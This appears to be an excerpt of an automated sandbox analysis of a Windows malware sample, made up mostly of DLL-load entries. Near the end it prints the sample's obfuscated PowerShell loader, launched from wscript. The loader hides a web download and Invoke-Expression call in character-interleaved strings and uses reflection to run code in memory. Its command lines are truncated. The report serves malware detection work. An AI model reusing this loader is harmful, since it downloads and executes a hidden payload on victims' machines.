              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1712568082.00000000083E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdb4 source: powershell.exe, 0000000E.00000002.1712568082.00000000083E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbpdb~B source: powershell.exe, 00000004.00000002.1359664490.0000021AA0D9D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000004.00000002.1361008061.0000021AA0FAE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ;.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1359664490.0000021AA0D9D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000E.00000002.1706090997.0000000007319000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgan", "0")
              Source: Yara matchFile source: 0000000E.00000002.1713697636.000000000B79F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1713506946.0000000008610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1700646122.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Pantsattes)$GLobal:HvislelyD = [SystEM.TeXT.ENcODing]::aSCii.GEtstRinG($nYmAANE)$GLObaL:mock=$HVIslElyd.SUbsTring($BIfLageLaTE,$KomPaTIBEl)<#Skovsneppers Ambreate Acyanoblepsia Afpol
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Blodrigst $Straalingernes $Conuses), (Blandingsformer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hcf213 = [AppDomain]::CurrentDomain.GetAssemblies()$g
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Rolfe)), $Doeling).DefineDynamicModule($Begaze, $false).DefineType($Transports, $Yperites, [System.MulticastDelegate])$Gannister.Defin
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Pantsattes)$GLobal:HvislelyD = [SystEM.TeXT.ENcODing]::aSCii.GEtstRinG($nYmAANE)$GLObaL:mock=$HVIslElyd.SUbsTring($BIfLageLaTE,$KomPaTIBEl)<#Skovsneppers Ambreate Acyanoblepsia Afpol
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd Zebo
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn 